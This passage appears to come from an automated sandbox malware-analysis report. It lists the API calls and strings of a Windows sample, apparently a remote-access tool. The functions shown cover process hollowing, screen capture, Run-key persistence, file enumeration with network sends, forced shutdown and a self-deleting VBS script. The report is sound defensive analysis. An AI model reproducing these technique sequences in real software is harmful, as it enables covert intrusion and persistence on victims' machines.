                                      • OpenProcessToken.ADVAPI32(00000000), ref: 02A17966
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 02A17978
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 02A17997
                                      • GetLastError.KERNEL32 ref: 02A1799D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                      • String ID: SeShutdownPrivilege
                                      • API String ID: 3534403312-3733053543
                                      • Opcode ID: 3fd4fc73d3467ed659b34cbb8c75c89f052756d417f2e39bc38de0c4fc6c04a1
                                      • Instruction ID: af875b38519e2424f47d25b8dd6407a782c67cf2595f3ec104189e835cb628b7
                                      • Opcode Fuzzy Hash: 3fd4fc73d3467ed659b34cbb8c75c89f052756d417f2e39bc38de0c4fc6c04a1
                                      • Instruction Fuzzy Hash: 03F0177184122AEBEB109BA0EC4DAEFBFBCEF05311F100851B809A5040DA348A15CAE1
                                      Function 02A09253 Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 02A09258
                                        • Part of subcall function 02A048C8: connect.WS2_32(?,?,?), ref: 02A048E0
                                        • Part of subcall function 02A04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02A04B36
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 02A092F4
                                      • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 02A09352
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 02A093AA
                                      • FindClose.KERNEL32(00000000), ref: 02A093C1
                                        • Part of subcall function 02A04E26: WaitForSingleObject.KERNEL32(?,000000FF,00000000,02A74EF8,?,00000000,02A74EF8,02A04CA8,00000000,?,?,00000000,02A74EF8,02A04AC9), ref: 02A04E38
                                        • Part of subcall function 02A04E26: SetEvent.KERNEL32(?,?,00000000,02A74EF8,02A04CA8,00000000,?,?,00000000,02A74EF8,02A04AC9), ref: 02A04E43
                                        • Part of subcall function 02A04E26: CloseHandle.KERNEL32(?,?,00000000,02A74EF8,02A04CA8,00000000,?,?,00000000,02A74EF8,02A04AC9), ref: 02A04E4C
                                      • FindClose.KERNEL32(00000000), ref: 02A095B9
                                        • Part of subcall function 02A04AA1: WaitForSingleObject.KERNEL32(?,00000000,02A01A45,?,?,00000004,?,?,00000004,02A76B50,02A74EE0,00000000), ref: 02A04B47
                                        • Part of subcall function 02A04AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,02A76B50,02A74EE0,00000000,?,?,?,?,?,02A01A45), ref: 02A04B75
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                      • String ID:
                                      • API String ID: 1824512719-0
                                      • Opcode ID: 1bfbf9409d4c4e96ab103f43b02622d37ff5cb766bd08119424256a9fd91def8
                                      • Instruction ID: bcf59c3d1a2f4333ac9a2579dfc8c639b1924f152525faf38efd84c1b5e82da9
                                      • Opcode Fuzzy Hash: 1bfbf9409d4c4e96ab103f43b02622d37ff5cb766bd08119424256a9fd91def8
                                      • Instruction Fuzzy Hash: D1B15032940219ABDB15EBA0EED5EEEB77AAF04710F10415AE50AA70D1EF705E49CF90
                                      Function 02A167B4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02A17952: GetCurrentProcess.KERNEL32(00000028,?), ref: 02A1795F
                                        • Part of subcall function 02A17952: OpenProcessToken.ADVAPI32(00000000), ref: 02A17966
                                        • Part of subcall function 02A17952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 02A17978
                                        • Part of subcall function 02A17952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 02A17997
                                        • Part of subcall function 02A17952: GetLastError.KERNEL32 ref: 02A1799D
                                      • ExitWindowsEx.USER32(00000000,00000001), ref: 02A16856
                                      • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 02A1686B
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A16872
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                      • String ID: PowrProf.dll$SetSuspendState
                                      • API String ID: 1589313981-1420736420
                                      • Opcode ID: 023184f6606e87da5a913337590d04c21225bfc756adfa486fdadeccc1bc433a
                                      • Instruction ID: c261a76e363e621bad9356b013228c421430e807d5aaa688d7f320f555c4bc4b
                                      • Opcode Fuzzy Hash: 023184f6606e87da5a913337590d04c21225bfc756adfa486fdadeccc1bc433a
                                      • Instruction Fuzzy Hash: B7217370A8430197DE14FBB4A9D89BF635F9F41794F804C19A146971C1EF649809CF61
                                      Function 02A0F7A7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02A13549: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00000000), ref: 02A13569
                                        • Part of subcall function 02A13549: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 02A13587
                                        • Part of subcall function 02A13549: RegCloseKey.ADVAPI32(00000000), ref: 02A13592
                                      • Sleep.KERNEL32(00000BB8), ref: 02A0F85B
                                      • ExitProcess.KERNEL32 ref: 02A0F8CA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseExitOpenProcessQuerySleepValue
                                      • String ID: 4.9.4 Pro$override$pth_unenc
                                      • API String ID: 2281282204-930821335
                                      • Opcode ID: 3345beefd06165678e34bb941fe445b3b4f8c721b35984f38e3e70718b5e3ca1
                                      • Instruction ID: 7c6b4e3532286e68fe21b9b31b82747417ea7c36fab10be96e222756023c3d73
                                      • Opcode Fuzzy Hash: 3345beefd06165678e34bb941fe445b3b4f8c721b35984f38e3e70718b5e3ca1
                                      • Instruction Fuzzy Hash: 87212961FD0301A7E9047B795EDEABF766B9B80B20F800019E40A976C5EF648D018FE7
                                      Function 02A5243C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 02A524D5
                                      • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 02A524FE
                                      • GetACP.KERNEL32 ref: 02A52513
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InfoLocale
                                      • String ID: ACP$OCP
                                      • API String ID: 2299586839-711371036
                                      • Opcode ID: a24953eea3feace8d89db8a9fd9caf9b398d9d6fa3e501d45bae550ef852484c
                                      • Instruction ID: a777407cf20fcdc0cc1cc7fbc6c8b9951338686253902a7523f6f6baf066403c
                                      • Opcode Fuzzy Hash: a24953eea3feace8d89db8a9fd9caf9b398d9d6fa3e501d45bae550ef852484c
                                      • Instruction Fuzzy Hash: AA21A732A40125E7EB34CF54D994BEB77B6EF44B68B4A8564ED0ADB200EF32D941C790
                                      Function 02A09665 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 02A0966A
                                      • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 02A096E2
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 02A0970B
                                      • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 02A09722
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstH_prologNext
                                      • String ID:
                                      • API String ID: 1157919129-0
                                      • Opcode ID: 11e5a533645298e3a48bd5a91dfaa492612b82fafb7fc590ddb5c444c7514e2b
                                      • Instruction ID: f43f65022b713ad7d422ed74ae948933023b093607c1d6b2a91ec77887c292a4
                                      • Opcode Fuzzy Hash: 11e5a533645298e3a48bd5a91dfaa492612b82fafb7fc590ddb5c444c7514e2b
                                      • Instruction Fuzzy Hash: 62811A329401199BDB15EBA0EED49EEB37ABF14354F10456AE50AA70D1EF30AE49CF90
                                      Function 02A52610 Relevance: 7.7, APIs: 5, Instructions: 188COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02A48215: GetLastError.KERNEL32(?,02A3F720,02A3A7F5,02A3F720,02A74EF8,?,02A3CE15,FF8BC35D,02A74EF8,02A74EF8), ref: 02A48219
                                        • Part of subcall function 02A48215: _free.LIBCMT ref: 02A4824C
                                        • Part of subcall function 02A48215: SetLastError.KERNEL32(00000000,FF8BC35D,02A74EF8,02A74EF8), ref: 02A4828D
                                        • Part of subcall function 02A48215: _abort.LIBCMT ref: 02A48293
                                        • Part of subcall function 02A48215: _free.LIBCMT ref: 02A48274
                                        • Part of subcall function 02A48215: SetLastError.KERNEL32(00000000,FF8BC35D,02A74EF8,02A74EF8), ref: 02A48281
                                      • GetUserDefaultLCID.KERNEL32 ref: 02A5271C
                                      • IsValidCodePage.KERNEL32(00000000), ref: 02A52777
                                      • IsValidLocale.KERNEL32(?,00000001), ref: 02A52786
                                      • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 02A527CE
                                      • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 02A527ED
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                      • String ID:
                                      • API String ID: 745075371-0
                                      • Opcode ID: 2b69b0f59721baab3e2573dba9c727c81156e89ebef71af82108b258dbaf8bd0
                                      • Instruction ID: 46050f183c826812caf45b9ccae71906afa4216e0e25e06b98da67faf93c562d
                                      • Opcode Fuzzy Hash: 2b69b0f59721baab3e2573dba9c727c81156e89ebef71af82108b258dbaf8bd0
                                      • Instruction Fuzzy Hash: E3513B71940226AEEF20DBA4DD84BBBB7B9EF18700F140469ED15EB190EF70D945CBA1
                                      Function 02A0880C Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 02A08811
                                      • FindFirstFileW.KERNEL32(00000000,?,02A66608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02A088CA
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 02A088F2
                                      • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02A088FF
                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02A08A15
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                      • String ID:
                                      • API String ID: 1771804793-0
                                      • Opcode ID: 44c4486b6fba4170be9070b47d2b532270d3d588f31d0b72881e1ad2f370da6d
                                      • Instruction ID: 7415ca92596acf0e0d15da70bd594ef678ac3192be0bea509d1b880a706fd05b
                                      • Opcode Fuzzy Hash: 44c4486b6fba4170be9070b47d2b532270d3d588f31d0b72881e1ad2f370da6d
                                      • Instruction Fuzzy Hash: 33517472D40209AADF04FB64EED99EE777AAF14344F40055AA80AA70D1EF349B48CF95
                                      Function 02A1C9E2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                      Download Yara Rule
                                      APIs
                                      • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 02A1CAD7
                                        • Part of subcall function 02A1376F: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,02A6611C), ref: 02A1377E
                                        • Part of subcall function 02A1376F: RegSetValueExA.ADVAPI32(02A6611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,02A1CAB1,WallpaperStyle,02A6611C,00000001,02A74EE0,00000000), ref: 02A137A6
                                        • Part of subcall function 02A1376F: RegCloseKey.ADVAPI32(02A6611C,?,?,02A1CAB1,WallpaperStyle,02A6611C,00000001,02A74EE0,00000000,?,02A0875D,00000001), ref: 02A137B1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateInfoParametersSystemValue
                                      • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                      • API String ID: 4127273184-3576401099
                                      • Opcode ID: 383bdf55e7825feaea9a939fa1418fb8bee7a56fb7090a7655f51f647d2c0757
                                      • Instruction ID: f6fe4da37d9eebcfe4b1541b09410312680ee9971639b7801350c56c3e77b454
                                      • Opcode Fuzzy Hash: 383bdf55e7825feaea9a939fa1418fb8bee7a56fb7090a7655f51f647d2c0757
                                      • Instruction Fuzzy Hash: C5114AA2FC031073F819753D0E6FF7E2A17A742B70F84019BEA422A6C6DE870A5446D3
                                      Function 02A51CD8 Relevance: 6.2, APIs: 4, Instructions: 236COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02A48215: GetLastError.KERNEL32(?,02A3F720,02A3A7F5,02A3F720,02A74EF8,?,02A3CE15,FF8BC35D,02A74EF8,02A74EF8), ref: 02A48219
                                        • Part of subcall function 02A48215: _free.LIBCMT ref: 02A4824C
                                        • Part of subcall function 02A48215: SetLastError.KERNEL32(00000000,FF8BC35D,02A74EF8,02A74EF8), ref: 02A4828D
                                        • Part of subcall function 02A48215: _abort.LIBCMT ref: 02A48293
                                      • IsValidCodePage.KERNEL32(00000000), ref: 02A51DBA
                                      • _wcschr.LIBVCRUNTIME ref: 02A51E4A
                                      • _wcschr.LIBVCRUNTIME ref: 02A51E58
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 02A51EFB
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                      • String ID:
                                      • API String ID: 4212172061-0
                                      • Opcode ID: c29151d1d40c886fe1c38aba5e403513724848e420118a40a3e21ffa19559454
                                      • Instruction ID: c9e7eb80a178110969bb2b8852e52dc7458e59f87cd1e42caa130b9b123125b2
                                      • Opcode Fuzzy Hash: c29151d1d40c886fe1c38aba5e403513724848e420118a40a3e21ffa19559454
                                      • Instruction Fuzzy Hash: E761F576640726AADB24AB34DD81FBB73A9EF04714F14046AED0DDB580EF74E944CBA0
                                      Function 02A18E76 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 328windowmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 02A18E90
                                      • CreateCompatibleDC.GDI32(00000000), ref: 02A18E9D
                                        • Part of subcall function 02A19325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 02A19355
                                      • CreateCompatibleBitmap.GDI32(00000000,?), ref: 02A18F13
                                      • DeleteDC.GDI32(00000000), ref: 02A18F2A
                                      • DeleteDC.GDI32(00000000), ref: 02A18F2D
                                      • DeleteObject.GDI32(00000000), ref: 02A18F30
                                      • SelectObject.GDI32(00000000,00000000), ref: 02A18F51
                                      • DeleteDC.GDI32(00000000), ref: 02A18F62
                                      • DeleteDC.GDI32(00000000), ref: 02A18F65
                                      • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 02A18F89
                                      • GetIconInfo.USER32(?,?), ref: 02A18FBD
                                      • DeleteObject.GDI32(?), ref: 02A18FEC
                                      • DeleteObject.GDI32(?), ref: 02A18FF9
                                      • DrawIcon.USER32(00000000,?,?,?), ref: 02A19006
                                      • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 02A1903C
                                      • GetObjectA.GDI32(00000000,00000018,?), ref: 02A19068
                                      • LocalAlloc.KERNEL32(00000040,00000001), ref: 02A190D5
                                      • GlobalAlloc.KERNEL32(00000000,?), ref: 02A19144
                                      • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02A19168
                                      • DeleteDC.GDI32(?), ref: 02A1917C
                                      • DeleteDC.GDI32(00000000), ref: 02A1917F
                                      • DeleteObject.GDI32(00000000), ref: 02A19182
                                      • GlobalFree.KERNEL32(?), ref: 02A1918D
                                      • DeleteObject.GDI32(00000000), ref: 02A19241
                                      • GlobalFree.KERNEL32(?), ref: 02A19248
                                      • DeleteDC.GDI32(?), ref: 02A19258
                                      • DeleteDC.GDI32(00000000), ref: 02A19263
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                      • String ID: DISPLAY
                                      • API String ID: 479521175-865373369
                                      • Opcode ID: 303bf3f9208b9b6da950b2d95d75200afff559bec34b4f8bd40fc42a1bf7fd0e
                                      • Instruction ID: 8f5fdf9ab77d5a36cb16cbcace590ae10aa09cf7317b4a54801aaef263668351
                                      • Opcode Fuzzy Hash: 303bf3f9208b9b6da950b2d95d75200afff559bec34b4f8bd40fc42a1bf7fd0e
                                      • Instruction Fuzzy Hash: 82C13A71548351AFE724DF24D988B6BBBE9EF88750F00481DF98997290DF34E905CBA2
                                      Function 02A180EF Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 02A18136
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A18139
                                      • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 02A1814A
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1814D
                                      • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 02A1815E
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A18161
                                      • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 02A18172
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A18175
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02A18217
                                      • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 02A1822F
                                      • GetThreadContext.KERNEL32(?,00000000), ref: 02A18245
                                      • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 02A1826B
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02A182ED
                                      • TerminateProcess.KERNEL32(?,00000000), ref: 02A18301
                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 02A18341
                                      • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 02A1840B
                                      • SetThreadContext.KERNEL32(?,00000000), ref: 02A18428
                                      • ResumeThread.KERNEL32(?), ref: 02A18435
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02A1844C
                                      • GetCurrentProcess.KERNEL32(?), ref: 02A18457
                                      • TerminateProcess.KERNEL32(?,00000000), ref: 02A18472
                                      • GetLastError.KERNEL32 ref: 02A1847A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                      • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                      • API String ID: 4188446516-3035715614
                                      • Opcode ID: e8ea1b6d1cbf9396427ec5a27ba0e9ad48769a245d5515d942f207edbde2dd0a
                                      • Instruction ID: 2bf3b6b2c22790addb8551eda043a0fe0dd77f0a7c6eb6f9307490b4a0ad43ce
                                      • Opcode Fuzzy Hash: e8ea1b6d1cbf9396427ec5a27ba0e9ad48769a245d5515d942f207edbde2dd0a
                                      • Instruction Fuzzy Hash: 59A14AB0A44301EFEB108F64DC89B6BBBE8FB48718F04082AF695D6191DF74E815CB56
                                      Function 02A0D420 Relevance: 38.8, APIs: 6, Strings: 16, Instructions: 282registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02A12850: TerminateProcess.KERNEL32(00000000,?,02A0D80F), ref: 02A12860
                                        • Part of subcall function 02A12850: WaitForSingleObject.KERNEL32(000000FF,?,02A0D80F), ref: 02A12873
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 02A0D51D
                                      • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 02A0D530
                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 02A0D549
                                      • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 02A0D579
                                        • Part of subcall function 02A0B8AC: TerminateThread.KERNEL32(02A0A27D,00000000,00000000,?,02A0D442,?,00000000), ref: 02A0B8BB
                                        • Part of subcall function 02A0B8AC: UnhookWindowsHookEx.USER32(02A750F0), ref: 02A0B8C7
                                        • Part of subcall function 02A0B8AC: TerminateThread.KERNEL32(02A0A267,00000000,?,02A0D442,?,00000000), ref: 02A0B8D5
                                        • Part of subcall function 02A1C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,02A1C510,00000000,00000000,00000000), ref: 02A1C430
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,02A66468,02A66468,00000000), ref: 02A0D7C4
                                      • ExitProcess.KERNEL32 ref: 02A0D7D0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                      • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                      • API String ID: 1861856835-1536747724
                                      • Opcode ID: 9113c71068816f9d61ddaf8bf18fbb971bb3dc7614c1029e39de4ca6b468135a
                                      • Instruction ID: 22d89e825e0c9b512591bb0be878cb2836d4ff1a1e160156efe4783f8d85d8f2
                                      • Opcode Fuzzy Hash: 9113c71068816f9d61ddaf8bf18fbb971bb3dc7614c1029e39de4ca6b468135a
                                      • Instruction Fuzzy Hash: 5F9192216843005AD715FB60FDD4AEFB3AAEF95714F40082FA54A931E1EF609D0DCE96
                                      Function 02A12475 Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 190synchronizationsleepfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,02A750E4,00000003), ref: 02A12494
                                      • ExitProcess.KERNEL32(00000000), ref: 02A124A0
                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 02A1251A
                                      • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 02A12529
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02A12534
                                      • CloseHandle.KERNEL32(00000000), ref: 02A1253B
                                      • GetCurrentProcessId.KERNEL32 ref: 02A12541
                                      • PathFileExistsW.SHLWAPI(?), ref: 02A12572
                                      • GetTempPathW.KERNEL32(00000104,?), ref: 02A125D5
                                      • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 02A125EF
                                      • lstrcatW.KERNEL32(?,.exe), ref: 02A12601
                                        • Part of subcall function 02A1C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,02A1C510,00000000,00000000,00000000), ref: 02A1C430
                                      • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 02A12641
                                      • Sleep.KERNEL32(000001F4), ref: 02A12682
                                      • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 02A12697
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02A126A2
                                      • CloseHandle.KERNEL32(00000000), ref: 02A126A9
                                      • GetCurrentProcessId.KERNEL32 ref: 02A126AF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                      • String ID: .exe$WDH$exepath$open$temp_
                                      • API String ID: 2649220323-3088914985
                                      • Opcode ID: 77353debb35888e22508bcf1f91ff48c1c7357c856978553372a6c97195b0e04
                                      • Instruction ID: b4861ec62b2ac00a9513d55f1acb33a49011ed233be1cb4ef299cc965fe8efc2
                                      • Opcode Fuzzy Hash: 77353debb35888e22508bcf1f91ff48c1c7357c856978553372a6c97195b0e04
                                      • Instruction Fuzzy Hash: CF518671E80325ABDF10A7A0ADD9BFF736EAB44720F400596F916A71C0DF748E46CA94
                                      Function 02A1B047 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 180synchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 02A1B13C
                                      • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 02A1B150
                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,02A660A4), ref: 02A1B178
                                      • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,02A74EE0,00000000), ref: 02A1B18E
                                      • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 02A1B1CF
                                      • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 02A1B1E7
                                      • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 02A1B1FC
                                      • SetEvent.KERNEL32 ref: 02A1B219
                                      • WaitForSingleObject.KERNEL32(000001F4), ref: 02A1B22A
                                      • CloseHandle.KERNEL32 ref: 02A1B23A
                                      • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 02A1B25C
